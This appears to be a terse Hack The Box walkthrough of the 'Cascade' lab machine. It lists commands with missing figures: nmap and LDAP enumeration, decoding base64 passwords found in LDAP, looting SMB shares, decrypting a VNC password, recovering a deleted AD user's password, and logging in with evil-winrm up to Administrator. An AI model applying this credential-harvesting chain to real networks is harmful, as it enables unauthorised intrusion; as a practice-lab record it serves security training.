Cascade Machine

  • -sC: scan with the default Nmap scripts.
  • -sV: version detection.
  • -oA: write the output in the three major formats at once.
#Command: 
$ nmap -sC -sV -oA nmap 10.10.10.182
Figure: 1
#Command: 
$ ldapsearch -x -h 10.10.10.182 -p 389 -s base namingcontexts
#Command: 
$ ldapsearch -LLL -x -H ldap://10.10.10.182 -b 'DC=CASCADE,DC=LOCAL' > ldap.out
Figure: 2
#Command: 
$ cat ldap.out | fgrep -i pwd
Figure: 3
#Command: 
$ echo -n clk0bjVldmE= | base64 -d
Figure: 4
Figure: 5
#Command: 
$ smbclient -U r.thompson -L 10.10.10.182
Figure: 6
#Command: 
$ smbclient \\\\10.10.10.182\\Data -U r.thompson
Figure: 7
#Command: 
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
Figure: 8
#Command: 
$ cat 'VNC Install.reg'
Figure: 9
#Command: 
$ vncpwd.exe 6bcf2a4b6e5aca0f
Figure: 10
#Command: 
$ evil-winrm -i 10.10.10.182 -u s.smith
Figure: 11
#Command: 
$ smbclient -U s.smith -L 10.10.10.182
Figure: 12
#Command: 
$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith
Figure: 13
#Command: 
$ python -m SimpleHTTPServer 8000
Figure: 14
Figure: 15
Figure: 16
Figure: 17
Figure: 18
Figure: 19
Figure: 20
#Command: 
$ evil-winrm -i 10.10.10.182 -u ArkSvc
Figure: 21
Figure: 22
Figure: 23
#Command: 
> Get-ADObject -SearchBase "CN=Deleted Objects,DC=cascade,DC=local" -LDAPFilter "(objectClass=*)" -IncludeDeletedObjects | Format-List Name,ObjectClass,ObjectGuid
Figure: 24
#Command: 
> Get-ADObject -IncludeDeletedObjects -Filter 'objectclass -eq "user" -and IsDeleted -eq $True' -Properties cascadeLegacyPwd
Figure: 25
#Command: 
$ echo -n YmFDVDNyMWFOMDBkbGVz | base64 -d
Figure: 26
#Command: 
$ evil-winrm -i 10.10.10.182 -u Administrator
Figure: 27

cY83rR0H1t

MSc CyberSecurity | Cybersecurity researcher | OSCP | CRTP | eCPPTv2 | eJPT | CEHv10 | Hack The Box player | CTF player